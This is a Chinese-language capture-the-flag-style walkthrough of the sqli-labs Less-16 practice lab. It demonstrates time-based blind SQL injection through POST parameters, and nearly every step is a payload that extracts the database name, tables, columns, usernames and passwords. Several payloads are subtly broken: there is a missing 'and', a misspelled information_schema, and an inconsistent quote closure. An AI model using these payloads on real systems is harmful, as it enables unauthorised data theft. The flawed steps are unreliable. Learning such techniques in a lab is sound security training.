Less-16-基于bool型/时间延迟双引号POST型盲注
·
环境:
目标网站:192.168.99.122:9000/sqli-labs-master/Less-16
攻击环境:浏览器
目标:
获取目标网站数据库的用户名和密码
实验步骤
1.访问目标网站:192.168.99.122:9000/sqli-labs-master/Less-16
2.打开浏览器,输入目标网站并输入参数

3.打开hackerbar,加载当前网址勾选Post data选项,输入request请求包中的network -->request payload,加'页面返回 正常
http://192.168.99.122:9000/sqli-labs-master/less-16
request payload:
uname=admin1'&passwd=admin&submit=Submit

4.加")返回正常,并显示页面登录成功
http://192.168.99.122:9000/sqli-labs-master/less-16
request payload:
uname=admin1")&passwd=admin&submit=Submit

5.通过上述结果发现页面无论输入什么都不会出现报错,此时尝试延时注入,发现页面有明显延迟说明页面存在SQL注入,闭合方式("")。
http://192.168.99.122:9000/sqli-labs-master/less-16
request payload:
uname=admin1") and sleep(5)#&passwd=admin&submit=Submit

6.猜解数据库的长度,等于8时发现页面有明显延迟,说明数据库的长度为8。
http://192.168.99.122:9000/sqli-labs-master/less-16
request payload:
uname=admin1") and if(length(database())=8,sleep(5),1)#&passwd=admin&submit=Submit

7.猜解数据的名称
http://192.168.99.122:9000/sqli-labs-master/less-16
request payload:
uname=admin1")and if(left(database(),1)='s',sleep(5),1)#&passwd=admin&submit=Submit
修改left参数,逐步猜解数据库名称


8.猜解security数据中的表的个数
http://192.168.99.122:9000/sqli-labs-master/less-16
request payload:
uname=admin1") if(((select count(*) from information_schema.tables where table_schema='security')=4),sleep(5),1)#&passwd=admin&submit=Submit

9.猜解数据库表中的名称
http://192.168.99.122:9000/sqli-labs-master/less-16
request payload:
uname=admin1") and if(left((select table_name from information_schema.tables where table_schema='security' LIMIT 0,1),1)='e',sleep(5),1)#&passwd=admin&submit=Submit

10.猜解表的字段的个数。
http://192.168.99.122:9000/sqli-labs-master/less-16
request payload:
uname=admin1") and if(((select count(*) from informaion_shchema.columns where table_name='users')=14),sleep(5),1)#&passwd=admin&submit=Submit


11.猜解表的内容的个数
http://192.168.99.122:9000/sqli-labs-master/less-16
request payload:
uname=admin1") and if(left((select column_name from informaion_shchema.columns where table_name='users' limit 11,1),2) ='id',sleep(5),1) #&passwd=admin&submit=Submit

12.猜解username内容的长度
http://192.168.99.122:9000/sqli-labs-master/less-16
request payload:
uname=admin1") and if(length((select username from security.users limit 0,1)) =4,sleep(5),1)#&passwd=admin&submit=Submit

13.猜解猜解password字段内容的长度
http://192.168.99.122:9000/sqli-labs-master/less-16
request payload:
uname=admin1' and if(length((select password from security.users limit 0,1)) =4,sleep(5),1)#&passwd=admin&submit=Submit

14.猜解user表的username字段的内容
http://192.168.99.122:9000/sqli-labs-master/less-16
request payload:
uname=admin1' and if(left((select username from security.users limit 0,1),1) ='D',sleep(5),1)#&passwd=admin&submit=Submit

15.猜解password字段的内容
http://192.168.99.122:9000/sqli-labs-master/less-16
request payload:
uname=admin1' and if(left((select password from security.users limit 0,1),1) ='D',sleep(5),1)#&passwd=admin&submit=Submit

更多推荐



所有评论(0)